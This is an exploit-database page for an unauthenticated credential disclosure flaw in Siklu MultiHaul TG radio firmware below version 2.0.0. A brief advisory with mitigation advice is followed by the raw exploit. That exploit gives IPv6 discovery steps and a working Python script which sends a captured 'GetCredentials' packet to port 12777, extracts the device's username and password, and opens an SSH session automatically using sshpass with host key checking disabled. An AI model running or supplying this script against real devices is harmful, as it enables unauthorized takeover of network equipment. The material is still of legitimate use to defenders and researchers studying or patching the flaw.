header-logo
Suggest Exploit
vendor:
MultiHaul TG series
by:
semaja2
6.1
CVSS
HIGH
Credential Disclosure
798
CWE
Product Name: MultiHaul TG series
Affected Version From: Version < 2.0.0
Affected Version To: Version < 2.0.0
Patch Exists: NO
Related CWE:
CPE: a:siklu:multihaultg_firmware:<2.0.0
Metasploit:
Other Scripts:
Platforms Tested:
2024

Siklu MultiHaul TG series – Unauthenticated Credential Disclosure

The Siklu MultiHaul TG series with a version less than 2.0.0 allows unauthenticated credential disclosure. By exploiting this vulnerability, an attacker can obtain random generated username and password, gaining unauthorized access to the device.

Mitigation:

Update to version 2.0.0 or higher to mitigate this vulnerability. Additionally, restrict network access to the device to trusted hosts only.
Source

Exploit-DB raw data:

# Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure
# Date: 28-02-2024
# Exploit Author: semaja2
# Vendor Homepage: https://siklu.com/
# Software Link: https://partners.siklu.com/home/frontdoor
# Version: < 2.0.0
# Tested on: 2.0.0
# CVE : None assigned
#
# Instructions
# 1. Perform IPv6 host detect by pinging all host multicast address for interface attached to device
# `ping6 -I en7 -c 2 ff02::1`
# 2. Review IPv6 neighbours and identify target device based on vendor component of MAC address
# `ip -6 neigh show dev en7`
# 3. Execute script
# `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7`
# 4. Enjoy the access



import socket
import sys
import os

address = str(sys.argv[1])  # the target
port = 12777

# Captured command, sends "GetCredentials" to obtain random generated username/password
cmd = bytearray.fromhex("000000290FFF000100000001000100000000800100010000000E47657443726564656E7469616C730000000000")

addrinfo = socket.getaddrinfo(address, port, socket.AF_INET6, socket.SOCK_STREAM)
(family, socktype, proto, canonname, sockaddr) = addrinfo[0]
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
s.connect(sockaddr)
s.send(cmd)
data = s.recv(200)
s.close()
output = "".join(map(chr, data))

# Split output, then remove trailing noise as string length is always 35
splits = output.split('#')
username = splits[1][slice(0, 35, 1)]
password = splits[2][slice(0, 35, 1)]
print('Username: ', username)
print('Password: ', password)
os.system("sshpass -p {password} ssh -o StrictHostKeychecking=no {address} -l {username}".format(address = address, username = username, password = password))